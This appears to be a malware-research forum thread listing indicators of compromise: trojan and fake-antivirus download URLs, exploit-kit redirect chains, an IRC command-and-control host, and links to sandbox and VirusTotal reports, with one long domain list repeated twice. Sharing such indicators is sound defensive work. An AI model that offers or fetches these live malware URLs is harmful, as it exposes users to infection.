http://uniquexporn.com/promo.exehttp://www.virustotal.com/analisis/14a94fb9a291d16fbbade9a078d67846
http://bonuspromooffer.com/srm/adv/142/?a=cspsant1p&l=273&f=cs_7175823974&ex=&ed=⊂=&prodabbr=USRM
-
exploit
http://niggerok.com/fafa/index.php
http://wepawet.iseclab.org/view.php?hash=84b34a34e05a7d00fe9198ae4d2d5424&t=1239555288&type=js
http://expfanclub.com/lom/index.php
http://wepawet.iseclab.org/view.php?hash=b410ff492fbd79ddfae0c102b7792993&t=1239555215&type=js
http://seofucking.com/vavilon/
http://wepawet.iseclab.org/view.php?hash=9d3ad64e279e1692d7490f208600c233&t=1239555455&type=js
-
the last one which leads to http://seofucking.com/vavilon/load.php is ambler trojan
-
195.88.80.41
hxxp://slk-downloads.com/promo.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/73c3f615c00dcc5718e7b6279fa0961a) 7/40 (17.5%)
76.73.21.186
config:
http://76.73.21.186/ldr/loadList.php?version=1
files:
hxxp://76.73.21.186/ldr/dl/zchMiB.exe
hxxp://76.73.21.186/ldr/dl/part.exe
hxxp://76.73.21.186/ldr/dl/minisvr4.exe (not found)
hxxp://76.73.21.186/ldr/dl/clkw.exe
hxxp://76.73.21.186/ldr/dl/websvr.exe
VirusTotal results:
zchMiB.exe - Trojan Autoit (http://www.virustotal.com/analisis/99e6d74df3bc3be73509bdfbe62aa4dc) 21/39 (53.85%)
part.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 21/40 (52.5%)
clkw.exe - Trojan Autoit (http://www.virustotal.com/analisis/85daff7fe1ee66559bda58efea4f4d90) 13/40 (32.50%)
websvr.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 10/40 (25%)
-
194.165.4.77
hxxp://loyal-porno.com/scan/?
hxxp://loyal-porno.com/tube/?
hxxp://loyal-porno.com/codec.exe
1) Fake Scanner Page
2) Fake Codec Page
3) Trojan
VirusTotal (http://www.virustotal.com/analisis/dfde556533497ac71d555742d6d6f741) 7/40 (17.5%)
-
91.212.41.119
hxxp://tixwagoq.cn/in.cgi?6
redirect to exploit
91.212.41.119
hxxp://paylayos.cn/nuc/index.php
which load
hxxp://paylayos.cn/nuc/exe.php
then load the flash exploit
hxxp://paylayos.cn/nuc/spl/pdf.pdf
to finally load the executable
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/823401c2f51007764b713f0894342507) 8/40 (20.00%)
Redirection Analysis: Wepawet (http://wepawet.iseclab.org/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&t=1239621305&type=js)
-
http://internetprotectedupdates.com/logo.bmp
http://protectionupdatecenter.com/wincontrol.dll
http://no-virus-pro-scan.com/11041/3/
http://files.pro-load-av-files.com/normal/setup_11041_3_1.exe
best-click-av1.info
http://download.best-click-av1.info/en/PE/install.exe
http://files.load-ms-av-soft.com/exe/setup_1_2_1.exe
http://dl.super-top-scan-pro.com/get/?pin=0&lnd=0&type=main
http://dl.anispy-storage-ms.com/get/?pin=0&lnd=0&type=main
http://in6iz.com/download/InternetAntivirusPro.exe
-
other links for "best-click-av1.info"
http://download.best-click-av1.info/install.php?campaign=mmb_227523872&country=en&counter=4&campaign=mmb_227523872&landid=4
http://download.best-click-av1.info/en/PE/N1.CAB
http://download.best-click-av1.info/en/PE/QWProtect.dll
http://download.best-click-av1.info/en/PE/svchost.exe
VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/05357372ad0d72bf7fbb682e49f05539) 33/40 (82.5%)
VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/8a46dd8ec034177dc10243b33ba3fd1b) 11/39 (28.21%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/4e4aa550f799e703a19bff8939c14d56) 25/38 (65.79%)
VirusTotal: Trojan FakeAlert (http://www.virustotal.com/analisis/cc494b775cbce5316563c216335d1fc3) 28/38 (73.68%)
-
Sites related to Vxgame Trojan
http://onlinescanxp.com/?a=conf&code=502
antivirusxppro-2009.com
5-renus2008.com
http://free-web-scaners.biz/scan/?code=435
-
hxxp://w1.akc8.com/01/s.exe
hxxp://w1.ys8c.com/01/s.exe
hxxp://down.zhibo8.com/soft/spvod.exe
-
fake AV
http://lj3q.biz/av.26.0.exehttp://www.virustotal.com/analisis/b79cb1ea34600095ce75b3fccbfa5af3
http://megsw.com/av.26.0.exehttp://www.virustotal.com/analisis/d027aec77ed8c403b77c0b5b92e1ab97
Fake av loader
http://www.trart.net/vildanezik.net/album/default.exehttp://www.virustotal.com/analisis/14dbac952360d7d0672e372a75e9177b
http://porntubevidz.com/14.exehttp://www.virustotal.com/analisis/fc537777547fbeb743764d71e97edf4f
Trojan
http://216.195.58.114:35813/getLoader.php?p=1zHniWUaKiCQthttp://www.virustotal.com/analisis/41394ae810a5b070c6a4a48f664a75b5
Trojan
http://totalmic.if.ua/ftp2.exehttp://www.virustotal.com/analisis/049e37d45db1e083ce5c3def69aac306
Trojan
http://banksguard.com/pics/ncr.exehttp://www.virustotal.com/analisis/58dcebabde517dd1c0e38257b43a9e62
Trojan
http://auf-jeder.com/123.exehttp://www.virustotal.com/analisis/55f110a5dd1d46d6d29bcab867dd123c
-
Sites related to Rogue security applications
system-cleaner.net/load/setup.msi
tantispyware.com/load/setup.msi
webantispy.com/load/setup.msi
pantispyware09.com/dwn/setup.exe
-
hxxp://usrv03.ru/index.php?x=1
hxxp://usrv03.ru/pdf_1.php?id=3304
http://wepawet.iseclab.org/view.php?hash=fcb37c12aa47d8d4911a81e3d9749c95&t=1239735089&type=js
http://anubis.iseclab.org/?action=result&task_id=1ec2e01cf8ff3f72431c9490b047d70ef&format=html
-
http://antivirusxp09.com/img/
http://antivirusxp09.com/new/index.php
http://antivirusxp09.com/new2/index.php
http://antivirusxp09.com/new3/index.php
http://wepawet.iseclab.org/view.php?hash=1502f37ba459292fae9c5cffd524c714&t=1239736282&type=js
http://anubis.iseclab.org/?action=result&task_id=1f6f85e9801c0bf942dd45076c2ebac87
http://www.virustotal.com/analisis/5aca8d47cc3b7b20cb77529cede96a6a
-
Rogue Fake AV
hxxp://star4scan.com
hxxp://scan6easy.com
hxxp://scan6fast.com
hxxp://lux4scan.com
hxxp://luxscan4.com
hxxp://msscanner-files-av.com/200109/scan/
-
Trojan:
79.174.64.13/out.exehttp://www.virustotal.com/analisis/7bca934bb8e377eebe4edebfebf8523a
Trojan:
mal-waredoc.com/load.php?id=2http://www.virustotal.com/analisis/11576255e0680454c54efa2766cc9435
Trojan
s0si.ru/TT/load.phphttp://www.virustotal.com/analisis/a4a966837adda2c3cc34d981c93d93e6
trojan:
tradepark.info/photos/load.phphttp://www.virustotal.com/analisis/17a9c3d18044191a539072b82821e766
Trojan:
95.129.144.186/gf/ma.exehttp://www.virustotal.com/analisis/5e2316512208bcc9e0b38856182c39b1
Fake AV:
95.129.144.186/gf/swp.exehttp://www.virustotal.com/analisis/d05a9eb3e36e93f5fbe35d9375892596
rogue:
spy-wareprotector2009.com
-
kroto.biz/myy/index.php
kroto.biz/myy/cache/readme.pdf
kroto.biz/myy/cache/flash.swf
kroto.biz/myy/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=ba0ba1b23890b2b70125f744960bd863&t=1239788253&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40
kroto.biz/myy/index.php
kroto.biz/ins/cache/readme.pdf
kroto.biz/ins/cache/flash.swf
kroto.biz/ins/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=e7fd2ee3c218c66ad961163569df5dca&t=1239788768&type=js
http://www.virustotal.com/analisis/1176e423edaf89cf29ca7299fac7eefd 0/40
kroto.biz/opi/index.php
kroto.biz/opi/cache/readme.pdf
kroto.biz/opi/cache/flash.swf
kroto.biz/opi/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=a21882d077d3295aa223d46ef0e61158&t=1239788777&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40
-
redirector, play with the number
cjtrader.biz/in.php?s=1
redirects to Fake AV
tdncgo2009.com/?uid=36&pid=3
Fake AV
http://virussweeper-scanvirus.net/?p=nqd2a16poZ2eYJqMoKNqq6iQtFPEmZSjj8KqqVeYlJjXnrmMiXl%2BhIo%3D
vswpr.googlecode.com/svn/trunk/ReleaseXP.exehttp://www.virustotal.com/de/analisis/29d5d657b1b1e9b49b7ba3ca26f76fbe 2/40
-
All rogue
74.54.156.234
hxxp://download.adwarealert.com/vistasetup.exe
hxxp://download.adwarealert.com/setupxv.exe
hxxp://download.adwarealert.com/setup.exe
hxxp://download.adwarebot.com/setup.exe
hxxp://download.adwarebot.com/setupxv.exe
hxxp://download.antispyware.com/setup.exe
hxxp://download.antispyware.com/setupxv.exe
hxxp://download.antispyware2009.com/setup.exe
hxxp://download.antispywarebot.com/vistasetup.exe
hxxp://download.antispywarebot.com/setupxv.exe
hxxp://download.antispywarebot.com/setup.exe
hxxp://download.registrysmart.com/vistasetup.exe
hxxp://download.registrysmart.com/setupxv.exe
hxxp://download.registrysmart.com/setup.exe
hxxp://download.errorsweeper.com/vistasetup.exe
hxxp://download.errorsweeper.com/setup.exe
hxxp://download.privacycontrol.com/vistasetup.exe
hxxp://download.privacycontrol.com/setup.exe
hxxp://download.regclean.com/setupxp.exe
hxxp://download.regclean.com/setup.exe
hxxp://download.regclean.com/vistasetup.exe
hxxp://download.errorsmart.com/setup.exe
hxxp://download.errorsmart.com/vistasetup.exe
hxxp://download.regsweep.com/setupxv.exe
hxxp://download.regsweep.com/setup.exe
hxxp://download.regsweep.com/vistasetup.exe
hxxp://errorsmartdownload.com/setupxv.exe
hxxp://errorsmartdownload.com/setup.exe
75.125.200.226
hxxp://restore-pc.com/setup.php
hxxp://www.adwarealert.com/setup.exe
hxxp://evidenceeraser.com/setup.exe
-
www.r6c8d.cn/qvodsetupplus.exe
195.88.80.150/myfiles/138/v3/file.exe
u8.wgcn8.com/sb/ok.exe
www.bem1010.pagebr.com/bin/dat/.ubbs/videos.exe
www.hotlinkfiles.com/files/1473144_c3k20/wr-1-1974_3.exe
files.ms-load-av.com/exe/setup_200002.exe
ugh-softwares.com/promo.exe
winpc-antivirus.com/winav.exe
millanchannel.info/uddb.exe
www.infindha.com.br/images/ttopus.zip
web.cplnn.com/mmf32.exe
76.73.21.186/ploads/eula.exe
203.112.128.95/images/cgibin.exe
www.marrento.com/msg/messenger_2.exe
blog.npo-mash.org/nucleus/plugins/baby.jpg
94.247.2.123/Install.exe
lvdesign2.uuuq.com/creating/Instalador.gif
fullandtotalsecurity.com/install/ws.zip
91.212.65.12/o9s833f/uerty/wtaqlu.exe
www.adam.com.au/beaumont/virus/stinger.exe
webseguropronta.pagebr.com/kl/2.jpg
soft6.com/news/detail.asp?id=12557
sub.njcc.edu.cn/njhyxxx/index.asp
www.transport.net.cn
tongji.ctei.gov.cn
www.cqyfs.gov.cn
bbs.gddgw.com
blog.cnhubei.com/usera1/5589/index.html
medicine1.bjmu.edu.cn/department/bingli/index.htm
www.xlcedu.com
szsjmg.cn
xwb.hebtu.edu.cn/lwws/index.asp
www.0571auto.cn/showauto.asp?autoid=4322
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.668662.cn
585828.cn
www.688166.com
www.900388.com
www.338cp.com
www.cpw8282.cn
www.gp5588.com
www.998666.com
www.559678.com
www.552500.com
600976.com
www.34047.com
www.592233.com
www.678009.com
678009.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.tjdeda.com
www.aouchina.com
www.001jk.net
xinan.ccw.com.cn/shangpin.asp?id=39687
www.haobaobe.cn/sort/1_1.htm
www.jzjgxx.gov.cn
www.xacf168.com
www.jjwyy.com
szsjmg.cn
tongji.ctei.gov.cn
www.zgcy.gov.cn/videonews/index.asp
www.cqyfs.gov.cn
blog.cnhubei.com/usera1/5589/index.html
www.lygmzzjj.gov.cn
cae.nuaa.edu.cn/ftp/educ.htm
www.xachangfang.com
xx2.mao9988.cn
tougao.cnhubei.com
enews.guitarchina.com/picture
cae.nuaa.edu.cn/ftp/educ.htm
www.vip2009-qq.com
qqtx-10.com
alww-ts.cn
www.piypay.cn
www.163niu.cn
www.qqtx-10.com
u7.wgcn8.com/cj/a1.exe
ipkipk.3322.org/ipk.exe
u1.wgcn8.com/la/L7.exe
u2.wgcn8.com/gz/G1.exe
u9.wgcn8.com/cj/a2.exe
u4.wgcn8.com/gb/B7.exe
w1.aoc8.com/01/e1.exe
www.3d606.cn
www.gp890.com
www.539238.com
www.cp137.com
600906.com
cp137.com
www.3d3567.cn
www.wxdz7788.cn
www.cp05777.cn
www.44789.com
332336.com
331888.com
www.007788.net
www.331888.com
2009999.com
www.658658.cn
www.45765.com
www.113111.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.jjsga.gov.cn
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.haobaobe.cn
www.cacda.org.cn
www.transport.net.cn
www.jaycn.com
www.bjjdxy.com.cn
qqszn.cn/qqd
qqfof.com
www.yometop.cn
www.cvbnmdgesc.cn/1.exe
w5.ys8c.com/05/s.exe
sohu.go.8866.org
www.dnfdv.com
www.worldpersondictionary.com/5/C/C20.htm
www.worldexperts.org/9/T/T22/T22-1.htm
www.worlddailyweb.com
www.world-ad.com
www.chineseedu.org
www.chinesefamousdoctor.org
tour.dahe.cn/travelsite/PicShow.asp?tsid=349&dv_topicid=1533&picid=1301
www.jinleyuan.com/index.asp?ty=3
qq.200.net
radio.zjfc.edu.cn
www.oiac.com.cn/Df_web/index.asp
www.colour777.com
www.chinamf.com
www.qingdaochina.com
stu.syict.edu.cn
www.lyanjie.com
aes-online.ycu.jx.cn
hangji.nchu.jx.cn
ce.scu.edu.cn/bkjx/detail.asp?id=206
sph.bjmu.edu.cn/Html/downloads/index.htm
hkml.hainan.net/bszn/blsx.asp?newsId=394
job.icxo.com/corpJobIndex.do
www.yayunyq.com
www.cnhuishou.com
www.xawyrd.gov.cn/gly/wj/flashly/show.asp?id=17
www.nmg3j.com
www.jxgzsz.com/yw/readnews.asp?newsid=42
www.00186755.net
www.123-4.net
www.zjerhu.com/product.asp
www.chinese-chemical.net
www.szbus.com.cn
www.njrenchuang.com
www.gpec.cn
test.200.net
www.0571auto.cn
www.bjnissan.com.cn
www.jhxmzs.com
www.xsx.com.cn
zhaoban.bbxy.edu.cn/news_view.asp?newsid=413
www.hnemap.com/PublicWebUI/index.aspx
www.jinhaiyang-fdc.com.cn/d15573637
www.wyren.com.cn/d15542574/12.htm
www.lvzhou.com.cn
xstj.spe-edu.net/readnews.asp?newsid=132
www.xjjmh.com
www.zw001.net/index.asp
www.b3018.cn/article/4631.htm
www.ist.com.cn/news/rongyu/rongyu.html
www.lm188.com.cn/d3181052
www.4241.com/data.asp?dataid=2899
yyxz2.nhxy.com
www.tw103.com/soft/softcoshow.asp?id=1136
www.5tj.com
211.80.243.105/dlib/list.asp?lang=gb
www.goodsisters.cn/c3338
www.jeast.net/list.asp?classid=0
www.gkjiaolian.cn
www.lsit.net
www.cliy.com.cn/home/yuefu/index.asp
www.best4c.cn/star/10536
www.lvzhou.com.cn
www.lego123.com
www.p800.com
gbz.ycu.jx.cn
www.liuqiaoyun.com.cn
www.sdlfyz.cn/d5565381/4.htm
qqhx.uugua.cn/?196
rsz.ccjy.cn/school/gzzd/sfgl.htm
www.batongkeji.cn/d13462609
www.fsjy.cn/xg/xgkxfzg/onews.asp?id=58
www.adear.com.cn/tz
www.999art.com.cn/blog/blog.asp?name=ysf8s&month=2008-1
www.chinawatch.net
www.73ren.com/bbs/viewthread.php?tid=1755
www.cdxgt.com/product.asp?categoryid=0000100002
xy2mibao163.com.cn
x22qq.cn
s234.8866.org/1.exe
w1.akc8.com/01/s.exe
gg.onegreen.net/funshioninstall_c11407.exe
w1.163.com7w.com/01/o.exe
w9.akc8.com/09/s.exe
dlqlb.3322.org/box.exe
www.flczx.cn
www.cpzlw.cn
www.fc238.cn
www.fulicaipiao.com
www.cp728.com
www.zh-cw.com
www.68146.cn
tc908.com
www.cp110.com
www.dzhzqw.com
www.gpw858.cn
www.cp6158.cn
www.8688cp.cn
cp80998.cn
www.gcw58.cn
www.665578.com
www.sddz78.cn
www.163in.com
www.lf288.cn
www.hkying.cn
bo2288.com
www.bet2008.cc
www.wk988.com
www.maybao888.com
www.tt9898.com
www.66666ball.net
hk6669.com
hk6669.com
www.1688nba.com
www.mh48.com
899266.com
www.hk633.com
www.hkball.net.ru
www.238555.com
666128.com
www.zq5599.com
www.238111.com
www.gtx888.com
www.bet866.com
www.228cp.com
www.366555.cn
www.229899.cn
www.zh033.com
www.flcpglzx.cn
www.cp3555.com
www.84882.com
www.234444.com
www.789977.com
www.3d6848.cn
www.229899.cn
234444.com
www.1601800.com
www.zzwwong.cn
www.qiu7.cn
www.zq9a.cn
www.uugoal.com
qvod.com-2.cn/QvodSetup3.exe
keowo.cn/zip/pic02.exe
qyyjly.com/ie.exe
www.10000kp.cn
cfqqy.com
kk.hh51888.cn/cfqqy.com/1.htm
www.qqcfq.cn
ksss.us/taobao/index10.htm
jz2009jx.com
www.x-ba.com.cn
www.npgysy.com
invest.eefoo.com/jd/sdpx/200904/02-1313860.html
welcome.xz.vnet.cn
iom.ccom.edu.cn
auto1.zbinfo.net/jhby
www.zhonghuiaf.com
www.ghly.com
www.clima.org.cn
www.syzsrc.com/
www.ziweixing.com
www.ktv8848.cn/fhtz_info.asp?id=1614
www.51clean.com/co_cp_view.asp?id=205
www.hnyisheng.com/about.asp
www.sdxunda.cn
www.xtscl.cn
www.kimspetschool.cn
www.wow175.cn/news_display.asp?id=34
house.c029.com/newhouse/newhouse_dc.asp?id=458
www.qsxx.cn
gdtemei.cn
www.nb-water.com
www.csdnet.org/ynsm_show.asp?ID=9
www.keqi.com.cn
sph.bjmu.edu.cn
www.gpec.cn
www.langfangtv.com/html/zixun/index.html
www.towinner.com
Posted to:
http://bbs.vc52.cn/redirect.php?tid=82103
-
www.r6c8d.cn/qvodsetupplus.exe
195.88.80.150/myfiles/138/v3/file.exe
u8.wgcn8.com/sb/ok.exe
www.bem1010.pagebr.com/bin/dat/.ubbs/videos.exe
www.hotlinkfiles.com/files/1473144_c3k20/wr-1-1974_3.exe
files.ms-load-av.com/exe/setup_200002.exe
ugh-softwares.com/promo.exe
winpc-antivirus.com/winav.exe
millanchannel.info/uddb.exe
www.infindha.com.br/images/ttopus.zip
web.cplnn.com/mmf32.exe
76.73.21.186/ploads/eula.exe
203.112.128.95/images/cgibin.exe
www.marrento.com/msg/messenger_2.exe
blog.npo-mash.org/nucleus/plugins/baby.jpg
94.247.2.123/Install.exe
lvdesign2.uuuq.com/creating/Instalador.gif
fullandtotalsecurity.com/install/ws.zip
91.212.65.12/o9s833f/uerty/wtaqlu.exe
www.adam.com.au/beaumont/virus/stinger.exe
webseguropronta.pagebr.com/kl/2.jpg
soft6.com/news/detail.asp?id=12557
sub.njcc.edu.cn/njhyxxx/index.asp
www.transport.net.cn
tongji.ctei.gov.cn
www.cqyfs.gov.cn
bbs.gddgw.com
blog.cnhubei.com/usera1/5589/index.html
medicine1.bjmu.edu.cn/department/bingli/index.htm
www.xlcedu.com
szsjmg.cn
xwb.hebtu.edu.cn/lwws/index.asp
www.0571auto.cn/showauto.asp?autoid=4322
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.668662.cn
585828.cn
www.688166.com
www.900388.com
www.338cp.com
www.cpw8282.cn
www.gp5588.com
www.998666.com
www.559678.com
www.552500.com
600976.com
www.34047.com
www.592233.com
www.678009.com
678009.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.tjdeda.com
www.aouchina.com
www.001jk.net
xinan.ccw.com.cn/shangpin.asp?id=39687
www.haobaobe.cn/sort/1_1.htm
www.jzjgxx.gov.cn
www.xacf168.com
www.jjwyy.com
szsjmg.cn
tongji.ctei.gov.cn
www.zgcy.gov.cn/videonews/index.asp
www.cqyfs.gov.cn
blog.cnhubei.com/usera1/5589/index.html
www.lygmzzjj.gov.cn
cae.nuaa.edu.cn/ftp/educ.htm
www.xachangfang.com
xx2.mao9988.cn
tougao.cnhubei.com
enews.guitarchina.com/picture
cae.nuaa.edu.cn/ftp/educ.htm
www.vip2009-qq.com
qqtx-10.com
alww-ts.cn
www.piypay.cn
www.163niu.cn
www.qqtx-10.com
u7.wgcn8.com/cj/a1.exe
ipkipk.3322.org/ipk.exe
u1.wgcn8.com/la/L7.exe
u2.wgcn8.com/gz/G1.exe
u9.wgcn8.com/cj/a2.exe
u4.wgcn8.com/gb/B7.exe
w1.aoc8.com/01/e1.exe
www.3d606.cn
www.gp890.com
www.539238.com
www.cp137.com
600906.com
cp137.com
www.3d3567.cn
www.wxdz7788.cn
www.cp05777.cn
www.44789.com
332336.com
331888.com
www.007788.net
www.331888.com
2009999.com
www.658658.cn
www.45765.com
www.113111.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.jjsga.gov.cn
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.haobaobe.cn
www.cacda.org.cn
www.transport.net.cn
www.jaycn.com
www.bjjdxy.com.cn
qqszn.cn/qqd
qqfof.com
www.yometop.cn
www.cvbnmdgesc.cn/1.exe
w5.ys8c.com/05/s.exe
sohu.go.8866.org
www.dnfdv.com
www.worldpersondictionary.com/5/C/C20.htm
www.worldexperts.org/9/T/T22/T22-1.htm
www.worlddailyweb.com
www.world-ad.com
www.chineseedu.org
www.chinesefamousdoctor.org
tour.dahe.cn/travelsite/PicShow.asp?tsid=349&dv_topicid=1533&picid=1301
www.jinleyuan.com/index.asp?ty=3
qq.200.net
radio.zjfc.edu.cn
www.oiac.com.cn/Df_web/index.asp
www.colour777.com
www.chinamf.com
www.qingdaochina.com
stu.syict.edu.cn
www.lyanjie.com
aes-online.ycu.jx.cn
hangji.nchu.jx.cn
ce.scu.edu.cn/bkjx/detail.asp?id=206
sph.bjmu.edu.cn/Html/downloads/index.htm
hkml.hainan.net/bszn/blsx.asp?newsId=394
job.icxo.com/corpJobIndex.do
www.yayunyq.com
www.cnhuishou.com
www.xawyrd.gov.cn/gly/wj/flashly/show.asp?id=17
www.nmg3j.com
www.jxgzsz.com/yw/readnews.asp?newsid=42
www.00186755.net
www.123-4.net
www.zjerhu.com/product.asp
www.chinese-chemical.net
www.szbus.com.cn
www.njrenchuang.com
www.gpec.cn
test.200.net
www.0571auto.cn
www.bjnissan.com.cn
www.jhxmzs.com
www.xsx.com.cn
zhaoban.bbxy.edu.cn/news_view.asp?newsid=413
www.hnemap.com/PublicWebUI/index.aspx
www.jinhaiyang-fdc.com.cn/d15573637
www.wyren.com.cn/d15542574/12.htm
www.lvzhou.com.cn
xstj.spe-edu.net/readnews.asp?newsid=132
www.xjjmh.com
www.zw001.net/index.asp
www.b3018.cn/article/4631.htm
www.ist.com.cn/news/rongyu/rongyu.html
www.lm188.com.cn/d3181052
www.4241.com/data.asp?dataid=2899
yyxz2.nhxy.com
www.tw103.com/soft/softcoshow.asp?id=1136
www.5tj.com
211.80.243.105/dlib/list.asp?lang=gb
www.goodsisters.cn/c3338
www.jeast.net/list.asp?classid=0
www.gkjiaolian.cn
www.lsit.net
www.cliy.com.cn/home/yuefu/index.asp
www.best4c.cn/star/10536
www.lvzhou.com.cn
www.lego123.com
www.p800.com
gbz.ycu.jx.cn
www.liuqiaoyun.com.cn
www.sdlfyz.cn/d5565381/4.htm
qqhx.uugua.cn/?196
rsz.ccjy.cn/school/gzzd/sfgl.htm
www.batongkeji.cn/d13462609
www.fsjy.cn/xg/xgkxfzg/onews.asp?id=58
www.adear.com.cn/tz
www.999art.com.cn/blog/blog.asp?name=ysf8s&month=2008-1
www.chinawatch.net
www.73ren.com/bbs/viewthread.php?tid=1755
www.cdxgt.com/product.asp?categoryid=0000100002
xy2mibao163.com.cn
x22qq.cn
s234.8866.org/1.exe
w1.akc8.com/01/s.exe
gg.onegreen.net/funshioninstall_c11407.exe
w1.163.com7w.com/01/o.exe
w9.akc8.com/09/s.exe
dlqlb.3322.org/box.exe
www.flczx.cn
www.cpzlw.cn
www.fc238.cn
www.fulicaipiao.com
www.cp728.com
www.zh-cw.com
www.68146.cn
tc908.com
www.cp110.com
www.dzhzqw.com
www.gpw858.cn
www.cp6158.cn
www.8688cp.cn
cp80998.cn
www.gcw58.cn
www.665578.com
www.sddz78.cn
www.163in.com
www.lf288.cn
www.hkying.cn
bo2288.com
www.bet2008.cc
www.wk988.com
www.maybao888.com
www.tt9898.com
www.66666ball.net
hk6669.com
hk6669.com
www.1688nba.com
www.mh48.com
899266.com
www.hk633.com
www.hkball.net.ru
www.238555.com
666128.com
www.zq5599.com
www.238111.com
www.gtx888.com
www.bet866.com
www.228cp.com
www.366555.cn
www.229899.cn
www.zh033.com
www.flcpglzx.cn
www.cp3555.com
www.84882.com
www.234444.com
www.789977.com
www.3d6848.cn
www.229899.cn
234444.com
www.1601800.com
www.zzwwong.cn
www.qiu7.cn
www.zq9a.cn
www.uugoal.com
qvod.com-2.cn/QvodSetup3.exe
keowo.cn/zip/pic02.exe
qyyjly.com/ie.exe
www.10000kp.cn
cfqqy.com
kk.hh51888.cn/cfqqy.com/1.htm
www.qqcfq.cn
ksss.us/taobao/index10.htm
jz2009jx.com
www.x-ba.com.cn
www.npgysy.com
invest.eefoo.com/jd/sdpx/200904/02-1313860.html
welcome.xz.vnet.cn
iom.ccom.edu.cn
auto1.zbinfo.net/jhby
www.zhonghuiaf.com
www.ghly.com
www.clima.org.cn
www.syzsrc.com/
www.ziweixing.com
www.ktv8848.cn/fhtz_info.asp?id=1614
www.51clean.com/co_cp_view.asp?id=205
www.hnyisheng.com/about.asp
www.sdxunda.cn
www.xtscl.cn
www.kimspetschool.cn
www.wow175.cn/news_display.asp?id=34
house.c029.com/newhouse/newhouse_dc.asp?id=458
www.qsxx.cn
gdtemei.cn
www.nb-water.com
www.csdnet.org/ynsm_show.asp?ID=9
www.keqi.com.cn
sph.bjmu.edu.cn
www.gpec.cn
www.langfangtv.com/html/zixun/index.html
www.towinner.com
Posted to:
http://bbs.vc52.cn/redirect.php?tid=82103
gogo sysadm ;D
-
Trojan Webmoner
wiz2wix.com/out.exehttp://www.virustotal.com/analisis/b4c3c35969ab9091652570b7bb8f83ae
Ftp Stealer
tayforlive.ru/ftp_G.exehttp://www.virustotal.com/analisis/978f0644b6375647f10d3043123aa537
Trojan:
ftpgeoit.com/exe/9sys270.exehttp://www.virustotal.com/analisis/bdaf84af42d6fe1c146ae4a68479674b
Trojan:
ftpgeoit.com/exe/gld.exehttp://www.virustotal.com/analisis/2813968773754764f195f9abc458672a
Trojan:
ftpgeoit.com/exe/lich.exehttp://www.virustotal.com/analisis/a3d56941a5206226d019d76071f9c354
Exploits/trojan:
homesy.net/mu/index.phphttp://wepawet.iseclab.org/view.php?hash=943da6e620aeb897e9586e68771d1467&t=1239861325&type=js
Redirect to rogue:
Blogtransaction.cn/in.cgi?9
Bankinggolf.cn/in.cgi?9
Acousticnail.cn/in.cgi?9
ay.goldrushclub.cn/in.cgi?9all redirect to
1000league.com/in.cgi?9 (which is on MDL)
http://wepawet.cs.ucsb.edu/view.php?hash=a67a5af0914956eaf26cb260d4632a3e&t=1239830585&type=js
Then to Rogue:
msscan-files-antivir.com/200109/scan/
-
Here's a nifty pdf exploit...
hxxp://d0lphin.biz/max/in.php
Result: 4/40 (10%)
http://www.virustotal.com/analisis/de6f75f3c03f508662872923ff3c73bb
Here's what it returns for the time being...
http://wepawet.iseclab.org/view.php?hash=5edd49ee3561911ff34c53abade513a6&type=js
Result: 12/40 (30.00%)
http://www.virustotal.com/analisis/4e8ce4cab8a08a7754395eaf6192ce3a
Now go dig on the rest of domains there...
http://www.robtex.com/ip/210.83.85.94.html
===========================
hxxp://megapupseg.ru/xtrm/index.php
hxxp://www.murka-best.com/index.php?sall=miks_ind
===========================
hxxp://team-sleep.by.ru/menu.html
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/courier.html
hxxp://5rublei.com/unique/index.php
hxxp://bizoplata.ru/mortgage.html
hxxp://myrurrly.com/in.cgi?pipka3S
hxxp://tixwagoq.cn/in.cgi?4
hxxp://tochtonenado.com/yes/index.php
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/belt.html
hxxp://mixbunch.cn/scarf.html
http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&t=1239885967&type=js
===========================
hxxp://startdontstop.ru/bigmac.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
-
http://www.webpresence4u.co.uk/forms/use/email/POSTALESAMORPORSIEMPRE.phphttp://www.virustotal.com/analisis/a57dbbe538cbe01a060e27c60e0ff2a0
http://www.threatexpert.com/report.aspx?md5=ba19812a5c24c50bb7480d55e2e081ca
corresponding irc c&c
cnz0k3r.cdmon.org:6667
-
Exploit which lead to pinch trojan:
counnter.cn/z/count.php?o=1http://wepawet.iseclab.org/view.php?hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253&type=js
The pinch trojan:
counnter.cn/z/getexe.exe?o=1&t=1239892251&i=2057619350&e=1http://www.virustotal.com/analisis/da79eef38206c2e643777c17191ea4a8
Exploit/trojan:
teenagersporn.net/project2/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=bad316b7e10f1195eda2adf0c3da0a49&t=1239918254&type=js
Exploit/trojan:
google-advisior.cn/project2/index.phphttp://wepawet.iseclab.org/view.php?hash=535c6efb84e00f72ff3f5ecf9aca3df5&t=1239870763&type=js
Exploit/trojan:
